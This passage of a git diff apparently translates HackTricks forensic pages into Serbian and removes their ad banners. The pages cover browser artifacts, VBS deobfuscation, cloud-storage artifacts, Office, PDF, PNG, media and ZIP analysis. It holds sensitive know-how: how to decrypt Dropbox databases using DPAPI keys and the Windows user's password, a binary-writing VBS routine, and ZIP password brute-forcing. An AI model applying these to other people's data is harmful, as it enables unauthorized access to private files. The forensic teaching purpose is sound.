 
-- **History.db**: Contains `history_visits` and `history_items` tables with URLs and visit timestamps. Use `sqlite3` to query.
-- **Downloads.plist**: Information about downloaded files.
-- **Bookmarks.plist**: Stores bookmarked URLs.
-- **TopSites.plist**: Most frequently visited sites.
-- **Extensions.plist**: List of Safari browser extensions. Use `plutil` or `pluginkit` to retrieve.
-- **UserNotificationPermissions.plist**: Domains permitted to push notifications. Use `plutil` to parse.
-- **LastSession.plist**: Tabs from the last session. Use `plutil` to parse.
-- **Browser’s built-in anti-phishing**: Check using `defaults read com.apple.Safari WarnAboutFraudulentWebsites`. A response of 1 indicates the feature is active.
+- **History.db**: Sadrži tabele `history_visits` i `history_items` sa URL-ovima i vremenskim oznakama poseta. Koristite `sqlite3` za upite.
+- **Downloads.plist**: Informacije o preuzetim datotekama.
+- **Bookmarks.plist**: Čuva URL-ove oznaka.
+- **TopSites.plist**: Najčešće posećeni sajtovi.
+- **Extensions.plist**: Lista ekstenzija pretraživača Safari. Koristite `plutil` ili `pluginkit` za preuzimanje.
+- **UserNotificationPermissions.plist**: Domeni kojima je dozvoljeno slanje obaveštenja. Koristite `plutil` za analizu.
+- **LastSession.plist**: Kartice iz poslednje sesije. Koristite `plutil` za analizu.
+- **Browser’s built-in anti-phishing**: Proverite koristeći `defaults read com.apple.Safari WarnAboutFraudulentWebsites`. Odgovor 1 označava da je funkcija aktivna.
 
 ## Opera
 
-Opera's data resides in `/Users/$USER/Library/Application Support/com.operasoftware.Opera` and shares Chrome's format for history and downloads.
+Opera podaci se nalaze u `/Users/$USER/Library/Application Support/com.operasoftware.Opera` i deli format Chrome-a za istoriju i preuzimanja.
 
-- **Browser’s built-in anti-phishing**: Verify by checking if `fraud_protection_enabled` in the Preferences file is set to `true` using `grep`.
+- **Browser’s built-in anti-phishing**: Proverite tako što ćete proveriti da li je `fraud_protection_enabled` u datoteci Preferences postavljeno na `true` koristeći `grep`.
 
-These paths and commands are crucial for accessing and understanding the browsing data stored by different web browsers.
+Ove putanje i komande su ključne za pristup i razumevanje podataka o pretraživanju koje čuvaju različiti web pretraživači.
 
 ## References
 
@@ -169,12 +159,4 @@ These paths and commands are crucial for accessing and understanding the browsin
 - [https://books.google.com/books?id=jfMqCgAAQBAJ\&pg=PA128\&lpg=PA128\&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file)
 - **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123**
 
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=browser-artifacts) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=browser-artifacts" %}
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
index c22a6f566..ab6437275 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
@@ -1,50 +1,42 @@
 {{#include ../../../banners/hacktricks-training.md}}
 
-Some things that could be useful to debug/deobfuscate a malicious VBS file:
+Neke stvari koje bi mogle biti korisne za debagovanje/deobfuskaciju zlonamernog VBS fajla:
 
 ## echo
-
 ```bash
 Wscript.Echo "Like this?"
 ```
-
-## Commnets
-
+## Komentari
 ```bash
 ' this is a comment
 ```
-
 ## Test
-
 ```bash
 cscript.exe file.vbs
 ```
-
-## Write data to a file
-
+## Napišite podatke u datoteku
 ```js
 Function writeBinary(strBinary, strPath)
 
-    Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")
+Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")
 
-    ' below lines purpose: checks that write access is possible!
-    Dim oTxtStream
+' below lines purpose: checks that write access is possible!
+Dim oTxtStream
 
-    On Error Resume Next
-    Set oTxtStream = oFSO.createTextFile(strPath)
+On Error Resume Next
+Set oTxtStream = oFSO.createTextFile(strPath)
 
-    If Err.number <> 0 Then MsgBox(Err.message) : Exit Function
-    On Error GoTo 0
+If Err.number <> 0 Then MsgBox(Err.message) : Exit Function
+On Error GoTo 0
 
-    Set oTxtStream = Nothing
-    ' end check of write access
+Set oTxtStream = Nothing
+' end check of write access
 
-    With oFSO.createTextFile(strPath)
-        .Write(strBinary)
-        .Close
-    End With
+With oFSO.createTextFile(strPath)
+.Write(strBinary)
+.Close
+End With
 
 End Function
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
index f64869c3c..ea6097f05 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
@@ -1,114 +1,97 @@
-# Local Cloud Storage
+# Lokalna Cloud Skladišta
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=local-cloud-storage) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=local-cloud-storage" %}
 
 ## OneDrive
 
-In Windows, you can find the OneDrive folder in `\Users\\AppData\Local\Microsoft\OneDrive`. And inside `logs\Personal` it's possible to find the file `SyncDiagnostics.log` which contains some interesting data regarding the synchronized files:
+U Windows-u, možete pronaći OneDrive folder u `\Users\\AppData\Local\Microsoft\OneDrive`. I unutar `logs\Personal` moguće je pronaći datoteku `SyncDiagnostics.log` koja sadrži neke zanimljive podatke o sinhronizovanim datotekama:
 
-- Size in bytes
-- Creation date
-- Modification date
-- Number of files in the cloud
-- Number of files in the folder
-- **CID**: Unique ID of the OneDrive user
-- Report generation time
-- Size of the HD of the OS
+- Veličina u bajtovima
+- Datum kreiranja
+- Datum modifikacije
+- Broj datoteka u cloudu
+- Broj datoteka u folderu
+- **CID**: Jedinstveni ID OneDrive korisnika
+- Vreme generisanja izveštaja
+- Veličina HD operativnog sistema
 
-Once you have found the CID it's recommended to **search files containing this ID**. You may be able to find files with the name: _**\.ini**_ and _**\.dat**_ that may contain interesting information like the names of files synchronized with OneDrive.
+Kada pronađete CID, preporučuje se da **pretražujete datoteke koje sadrže ovaj ID**. Možda ćete moći da pronađete datoteke sa imenom: _**\.ini**_ i _**\.dat**_ koje mogu sadržati zanimljive informacije kao što su imena datoteka sinhronizovanih sa OneDrive.
 
 ## Google Drive
 
-In Windows, you can find the main Google Drive folder in `\Users\\AppData\Local\Google\Drive\user_default`\
-This folder contains a file called Sync_log.log with information like the email address of the account, filenames, timestamps, MD5 hashes of the files, etc. Even deleted files appear in that log file with its corresponding MD5.
+U Windows-u, možete pronaći glavni Google Drive folder u `\Users\\AppData\Local\Google\Drive\user_default`\
+Ovaj folder sadrži datoteku pod nazivom Sync_log.log sa informacijama kao što su email adresa naloga, imena datoteka, vremenski oznake, MD5 heševi datoteka, itd. Čak i obrisane datoteke se pojavljuju u toj log datoteci sa odgovarajućim MD5.
 
-The file **`Cloud_graph\Cloud_graph.db`** is a sqlite database which contains the table **`cloud_graph_entry`**. In this table you can find the **name** of the **synchronized** **files**, modified time, size, and the MD5 checksum of the files.
+Datoteka **`Cloud_graph\Cloud_graph.db`** je sqlite baza podataka koja sadrži tabelu **`cloud_graph_entry`**. U ovoj tabeli možete pronaći **ime** **sinhronizovanih** **datoteka**, vreme modifikacije, veličinu i MD5 kontrolni zbir datoteka.
 
-The table data of the database **`Sync_config.db`** contains the email address of the account, the path of the shared folders and the Google Drive version.
+Podaci tabele baze podataka **`Sync_config.db`** sadrže email adresu naloga, putanju deljenih foldera i verziju Google Drive-a.
 
 ## Dropbox
 
-Dropbox uses **SQLite databases** to manage the files. In this\
-You can find the databases in the folders:
+Dropbox koristi **SQLite baze podataka** za upravljanje datotekama. U ovom\
+Možete pronaći baze podataka u folderima:
 
 - `\Users\\AppData\Local\Dropbox`
 - `\Users\\AppData\Local\Dropbox\Instance1`
 - `\Users\\AppData\Roaming\Dropbox`
 
-And the main databases are:
+A glavne baze podataka su:
 
 - Sigstore.dbx
 - Filecache.dbx
 - Deleted.dbx
 - Config.dbx
 
-The ".dbx" extension means that the **databases** are **encrypted**. Dropbox uses **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN]())
+Ekstenzija ".dbx" znači da su **baze podataka** **enkriptovane**. Dropbox koristi **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN]())
 
-To understand better the encryption that Dropbox uses you can read [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html).
+Da biste bolje razumeli enkripciju koju Dropbox koristi, možete pročitati [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html).
 
-However, the main information is:
+Međutim, glavne informacije su:
 
-- **Entropy**: d114a55212655f74bd772e37e64aee9b
-- **Salt**: 0D638C092E8B82FC452883F95F355B8E
-- **Algorithm**: PBKDF2
-- **Iterations**: 1066
+- **Entropija**: d114a55212655f74bd772e37e64aee9b
+- **So**: 0D638C092E8B82FC452883F95F355B8E
+- **Algoritam**: PBKDF2
+- **Iteracije**: 1066
 
-Apart from that information, to decrypt the databases you still need:
+Pored tih informacija, da biste dekriptovali baze podataka, još uvek vam je potrebno:
 
-- The **encrypted DPAPI key**: You can find it in the registry inside `NTUSER.DAT\Software\Dropbox\ks\client` (export this data as binary)
-- The **`SYSTEM`** and **`SECURITY`** hives
-- The **DPAPI master keys**: Which can be found in `\Users\\AppData\Roaming\Microsoft\Protect`
-- The **username** and **password** of the Windows user
+- **enkriptovani DPAPI ključ**: Možete ga pronaći u registru unutar `NTUSER.DAT\Software\Dropbox\ks\client` (izvezite ove podatke kao binarne)
+- **`SYSTEM`** i **`SECURITY`** hives
+- **DPAPI master ključevi**: Koji se mogu pronaći u `\Users\\AppData\Roaming\Microsoft\Protect`
+- **korisničko ime** i **lozinka** Windows korisnika
 
-Then you can use the tool [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi_data_decryptor.html)**:**
+Zatim možete koristiti alat [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi_data_decryptor.html)**:**
 
 ![](<../../../images/image (443).png>)
 
-If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber_chef receipt]() putting the primary key as the "passphrase" inside the receipt.
-
-The resulting hex is the final key used to encrypt the databases which can be decrypted with:
+Ako sve prođe kako se očekuje, alat će označiti **primarni ključ** koji treba da **koristite za oporavak originalnog**. Da biste povratili originalni, jednostavno koristite ovaj [cyber_chef recept]() stavljajući primarni ključ kao "lozinku" unutar recepta.
 
+Rezultantni heksadecimalni broj je konačni ključ koji se koristi za enkripciju baza podataka koje se mogu dekriptovati sa:
 ```bash
 sqlite -k  config.dbx ".backup config.db" #This decompress the config.dbx and creates a clear text backup in config.db
 ```
+**`config.dbx`** baza podataka sadrži:
 
-The **`config.dbx`** database contains:
+- **Email**: Email korisnika
+- **usernamedisplayname**: Ime korisnika
+- **dropbox_path**: Putanja gde se nalazi dropbox folder
+- **Host_id: Hash** korišćen za autentifikaciju u cloud. Ovo se može opozvati samo sa veba.
+- **Root_ns**: Identifikator korisnika
 
-- **Email**: The email of the user
-- **usernamedisplayname**: The name of the user
-- **dropbox_path**: Path where the dropbox folder is located
-- **Host_id: Hash** used to authenticate to the cloud. This can only be revoked from the web.
-- **Root_ns**: User identifier
+**`filecache.db`** baza podataka sadrži informacije o svim datotekama i folderima sinhronizovanim sa Dropbox-om. Tabela `File_journal` je ona sa više korisnih informacija:
 
-The **`filecache.db`** database contains information about all the files and folders synchronized with Dropbox. The table `File_journal` is the one with more useful information:
+- **Server_path**: Putanja gde se datoteka nalazi unutar servera (ova putanja je prethodna sa `host_id` klijenta).
+- **local_sjid**: Verzija datoteke
+- **local_mtime**: Datum modifikacije
+- **local_ctime**: Datum kreiranja
 
-- **Server_path**: Path where the file is located inside the server (this path is preceded by the `host_id` of the client).
-- **local_sjid**: Version of the file
-- **local_mtime**: Modification date
-- **local_ctime**: Creation date
+Ostale tabele unutar ove baze sadrže zanimljivije informacije:
 
-Other tables inside this database contain more interesting information:
-
-- **block_cache**: hash of all the files and folders of Dropbox
-- **block_ref**: Related the hash ID of the table `block_cache` with the file ID in the table `file_journal`
-- **mount_table**: Share folders of dropbox
-- **deleted_fields**: Dropbox deleted files
+- **block_cache**: hash svih datoteka i foldera Dropbox-a
+- **block_ref**: Povezuje hash ID tabele `block_cache` sa ID datoteke u tabeli `file_journal`
+- **mount_table**: Deljeni folderi Dropbox-a
+- **deleted_fields**: Obrišene datoteke Dropbox-a
 - **date_added**
 
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=local-cloud-storage) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=local-cloud-storage" %}
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
index 2e07c739d..f736ecd16 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
@@ -1,36 +1,18 @@
-# Office file analysis
+# Analiza Office datoteka
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

+Za više informacija proverite [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). Ovo je samo sažetak:
 
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=office-file-analysis) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Microsoft je kreirao mnoge formate office dokumenata, pri čemu su dva glavna tipa **OLE formati** (kao što su RTF, DOC, XLS, PPT) i **Office Open XML (OOXML) formati** (kao što su DOCX, XLSX, PPTX). Ovi formati mogu uključivati makroe, što ih čini metama za phishing i malver. OOXML datoteke su strukturirane kao zip kontejneri, što omogućava inspekciju kroz raspakivanje, otkrivajući hijerarhiju datoteka i foldera i sadržaj XML datoteka.
 
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=office-file-analysis" %}
+Da bi se istražile strukture OOXML datoteka, data je komanda za raspakivanje dokumenta i struktura izlaza. Tehnike za skrivanje podataka u ovim datotekama su dokumentovane, što ukazuje na kontinuiranu inovaciju u skrivanju podataka unutar CTF izazova.
 
-For further information check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). This is just a sumary:
-
-Microsoft has created many office document formats, with two main types being **OLE formats** (like RTF, DOC, XLS, PPT) and **Office Open XML (OOXML) formats** (such as DOCX, XLSX, PPTX). These formats can include macros, making them targets for phishing and malware. OOXML files are structured as zip containers, allowing inspection through unzipping, revealing the file and folder hierarchy and XML file contents.
-
-To explore OOXML file structures, the command to unzip a document and the output structure are given. Techniques for hiding data in these files have been documented, indicating ongoing innovation in data concealment within CTF challenges.
-
-For analysis, **oletools** and **OfficeDissector** offer comprehensive toolsets for examining both OLE and OOXML documents. These tools help in identifying and analyzing embedded macros, which often serve as vectors for malware delivery, typically downloading and executing additional malicious payloads. Analysis of VBA macros can be conducted without Microsoft Office by utilizing Libre Office, which allows for debugging with breakpoints and watch variables.
-
-Installation and usage of **oletools** are straightforward, with commands provided for installing via pip and extracting macros from documents. Automatic execution of macros is triggered by functions like `AutoOpen`, `AutoExec`, or `Document_Open`.
+Za analizu, **oletools** i **OfficeDissector** nude sveobuhvatne alate za ispitivanje kako OLE tako i OOXML dokumenata. Ovi alati pomažu u identifikaciji i analizi ugrađenih makroa, koji često služe kao vektori za isporuku malvera, obično preuzimajući i izvršavajući dodatne zlonamerne pakete. Analiza VBA makroa može se izvršiti bez Microsoft Office-a korišćenjem Libre Office-a, koji omogućava debagovanje sa tačkama prekida i posmatranim promenljivama.
 
+Instalacija i korišćenje **oletools** su jednostavni, sa komandama za instalaciju putem pip-a i vađenje makroa iz dokumenata. Automatsko izvršavanje makroa se pokreće funkcijama kao što su `AutoOpen`, `AutoExec` ili `Document_Open`.
 ```bash
 sudo pip3 install -U oletools
 olevba -c /path/to/document #Extract macros
 ```
-
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=office-file-analysis) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=office-file-analysis" %}
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
index 769407b3a..a3ba0256f 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
@@ -1,28 +1,20 @@
-# PDF File analysis
+# PDF analiza
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

+**Za više detalja proverite:** [**https://trailofbits.github.io/ctf/forensics/**](https://trailofbits.github.io/ctf/forensics/)
 
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=pdf-file-analysis) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+PDF format je poznat po svojoj složenosti i potencijalu za prikrivanje podataka, što ga čini centralnom tačkom za CTF forenzičke izazove. Kombinuje elemente običnog teksta sa binarnim objektima, koji mogu biti kompresovani ili enkriptovani, i može uključivati skripte u jezicima kao što su JavaScript ili Flash. Da bi se razumeo PDF struktura, može se konsultovati Didier Stevensov [uvodni materijal](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), ili koristiti alati poput tekstualnog editora ili PDF-specifičnog editora kao što je Origami.
 
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pdf-file-analysis" %}
+Za dubinsko istraživanje ili manipulaciju PDF-ova, dostupni su alati poput [qpdf](https://github.com/qpdf/qpdf) i [Origami](https://github.com/mobmewireless/origami-pdf). Sakriveni podaci unutar PDF-ova mogu biti prikriveni u:
 
-**For further details check:** [**https://trailofbits.github.io/ctf/forensics/**](https://trailofbits.github.io/ctf/forensics/)
+- Nevidljivim slojevima
+- XMP metapodacima formata od Adobe-a
+- Inkrementalnim generacijama
+- Tekstu iste boje kao pozadina
+- Tekstu iza slika ili preklapajućih slika
+- Neprikazanim komentarima
 
-The PDF format is known for its complexity and potential for concealing data, making it a focal point for CTF forensics challenges. It combines plain-text elements with binary objects, which might be compressed or encrypted, and can include scripts in languages like JavaScript or Flash. To understand PDF structure, one can refer to Didier Stevens's [introductory material](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), or use tools like a text editor or a PDF-specific editor such as Origami.
-
-For in-depth exploration or manipulation of PDFs, tools like [qpdf](https://github.com/qpdf/qpdf) and [Origami](https://github.com/mobmewireless/origami-pdf) are available. Hidden data within PDFs might be concealed in:
-
-- Invisible layers
-- XMP metadata format by Adobe
-- Incremental generations
-- Text with the same color as the background
-- Text behind images or overlapping images
-- Non-displayed comments
-
-For custom PDF analysis, Python libraries like [PeepDF](https://github.com/jesparza/peepdf) can be used to craft bespoke parsing scripts. Further, the PDF's potential for hidden data storage is so vast that resources like the NSA guide on PDF risks and countermeasures, though no longer hosted at its original location, still offer valuable insights. A [copy of the guide](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) and a collection of [PDF format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) by Ange Albertini can provide further reading on the subject.
+Za prilagođenu analizu PDF-a, Python biblioteke poput [PeepDF](https://github.com/jesparza/peepdf) mogu se koristiti za izradu specijalizovanih skripti za parsiranje. Pored toga, potencijal PDF-a za skladištenje skrivenih podataka je toliko veliki da resursi poput NSA vodiča o rizicima i protivmera vezanim za PDF, iako više nisu dostupni na svojoj originalnoj lokaciji, i dalje nude dragocene uvide. [Kopija vodiča](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) i kolekcija [trikova za PDF format](https://github.com/corkami/docs/blob/master/PDF/PDF.md) od Ange Albertinija mogu pružiti dodatno čitanje na ovu temu.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
index 6108df028..d341f989e 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
@@ -1,9 +1,9 @@
 {{#include ../../../banners/hacktricks-training.md}}
 
-**PNG files** are highly regarded in **CTF challenges** for their **lossless compression**, making them ideal for embedding hidden data. Tools like **Wireshark** enable the analysis of PNG files by dissecting their data within network packets, revealing embedded information or anomalies.
+**PNG fajlovi** su veoma cenjeni u **CTF izazovima** zbog svoje **bezgubitne kompresije**, što ih čini idealnim za ugrađivanje skrivenih podataka. Alati poput **Wireshark** omogućavaju analizu PNG fajlova razlažući njihove podatke unutar mrežnih paketa, otkrivajući ugrađene informacije ili anomalije.
 
-For checking PNG file integrity and repairing corruption, **pngcheck** is a crucial tool, offering command-line functionality to validate and diagnose PNG files ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). When files are beyond simple fixes, online services like [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) provide a web-based solution for **repairing corrupted PNGs**, aiding in the recovery of crucial data for CTF participants.
+Za proveru integriteta PNG fajlova i popravku oštećenja, **pngcheck** je ključni alat, koji nudi funkcionalnost putem komandne linije za validaciju i dijagnostiku PNG fajlova ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Kada su fajlovi izvan jednostavnih popravki, online usluge poput [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) pružaju web-rešenje za **popravku oštećenih PNG-ova**, pomažući u oporavku ključnih podataka za učesnike CTF-a.
 
-These strategies underscore the importance of a comprehensive approach in CTFs, utilizing a blend of analytical tools and repair techniques to uncover and recover hidden or lost data.
+Ove strategije naglašavaju važnost sveobuhvatnog pristupa u CTF-ima, koristeći kombinaciju analitičkih alata i tehnika popravke za otkrivanje i oporavak skrivenih ili izgubljenih podataka.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
index 3d2103987..740622732 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
@@ -1,14 +1,14 @@
 {{#include ../../../banners/hacktricks-training.md}}
 
-**Audio and video file manipulation** is a staple in **CTF forensics challenges**, leveraging **steganography** and metadata analysis to hide or reveal secret messages. Tools such as **[mediainfo](https://mediaarea.net/en/MediaInfo)** and **`exiftool`** are essential for inspecting file metadata and identifying content types.
+**Manipulacija audio i video fajlovima** je osnovna komponenta u **CTF forenzičkim izazovima**, koristeći **steganografiju** i analizu metapodataka za skrivanje ili otkrivanje tajnih poruka. Alati kao što su **[mediainfo](https://mediaarea.net/en/MediaInfo)** i **`exiftool`** su neophodni za inspekciju metapodataka fajlova i identifikaciju tipova sadržaja.
 
-For audio challenges, **[Audacity](http://www.audacityteam.org/)** stands out as a premier tool for viewing waveforms and analyzing spectrograms, essential for uncovering text encoded in audio. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** is highly recommended for detailed spectrogram analysis. **Audacity** allows for audio manipulation like slowing down or reversing tracks to detect hidden messages. **[Sox](http://sox.sourceforge.net/)**, a command-line utility, excels in converting and editing audio files.
+Za audio izazove, **[Audacity](http://www.audacityteam.org/)** se ističe kao vrhunski alat za pregled talasnih oblika i analizu spektrograma, što je ključno za otkrivanje teksta kodiranog u audio. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** se toplo preporučuje za detaljnu analizu spektrograma. **Audacity** omogućava manipulaciju audio sadržajem kao što su usporavanje ili preokretanje pesama kako bi se otkrile skrivene poruke. **[Sox](http://sox.sourceforge.net/)**, alat za komandnu liniju, odlično se snalazi u konvertovanju i uređivanju audio fajlova.
 
-**Least Significant Bits (LSB)** manipulation is a common technique in audio and video steganography, exploiting the fixed-size chunks of media files to embed data discreetly. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** is useful for decoding messages hidden as **DTMF tones** or **Morse code**.
+**Manipulacija najmanje značajnim bitovima (LSB)** je uobičajena tehnika u audio i video steganografiji, koristeći fiksne veličine delova medijskih fajlova za diskretno umetanje podataka. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** je koristan za dekodiranje poruka skrivenih kao **DTMF tonovi** ili **Morseova azbuka**.
 
-Video challenges often involve container formats that bundle audio and video streams. **[FFmpeg](http://ffmpeg.org/)** is the go-to for analyzing and manipulating these formats, capable of de-multiplexing and playing back content. For developers, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** integrates FFmpeg's capabilities into Python for advanced scriptable interactions.
+Video izazovi često uključuju kontejnerske formate koji kombinuju audio i video tokove. **[FFmpeg](http://ffmpeg.org/)** je alat koji se koristi za analizu i manipulaciju ovim formatima, sposoban za de-multiplexing i reprodukciju sadržaja. Za programere, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** integriše FFmpeg-ove mogućnosti u Python za napredne skriptabilne interakcije.
 
-This array of tools underscores the versatility required in CTF challenges, where participants must employ a broad spectrum of analysis and manipulation techniques to uncover hidden data within audio and video files.
+Ova paleta alata naglašava svestranost potrebnu u CTF izazovima, gde učesnici moraju koristiti širok spektar tehnika analize i manipulacije kako bi otkrili skrivene podatke unutar audio i video fajlova.
 
 ## References
 
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
index d4e17eb0d..1ef2e4e64 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
@@ -1,20 +1,20 @@
-# ZIPs tricks
+# ZIPs trikovi
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**Command-line tools** for managing **zip files** are essential for diagnosing, repairing, and cracking zip files. Here are some key utilities:
+**Alatke za komandnu liniju** za upravljanje **zip datotekama** su neophodne za dijagnostikovanje, popravku i probijanje zip datoteka. Evo nekoliko ključnih alata:
 
-- **`unzip`**: Reveals why a zip file may not decompress.
-- **`zipdetails -v`**: Offers detailed analysis of zip file format fields.
-- **`zipinfo`**: Lists contents of a zip file without extracting them.
-- **`zip -F input.zip --out output.zip`** and **`zip -FF input.zip --out output.zip`**: Try to repair corrupted zip files.
-- **[fcrackzip](https://github.com/hyc/fcrackzip)**: A tool for brute-force cracking of zip passwords, effective for passwords up to around 7 characters.
+- **`unzip`**: Otkriva zašto zip datoteka možda ne može da se raspakuje.
+- **`zipdetails -v`**: Pruža detaljnu analizu polja formata zip datoteke.
+- **`zipinfo`**: Navodi sadržaj zip datoteke bez vađenja.
+- **`zip -F input.zip --out output.zip`** i **`zip -FF input.zip --out output.zip`**: Pokušavaju da poprave oštećene zip datoteke.
+- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Alat za brute-force probijanje zip lozinki, efikasan za lozinke do oko 7 karaktera.
 
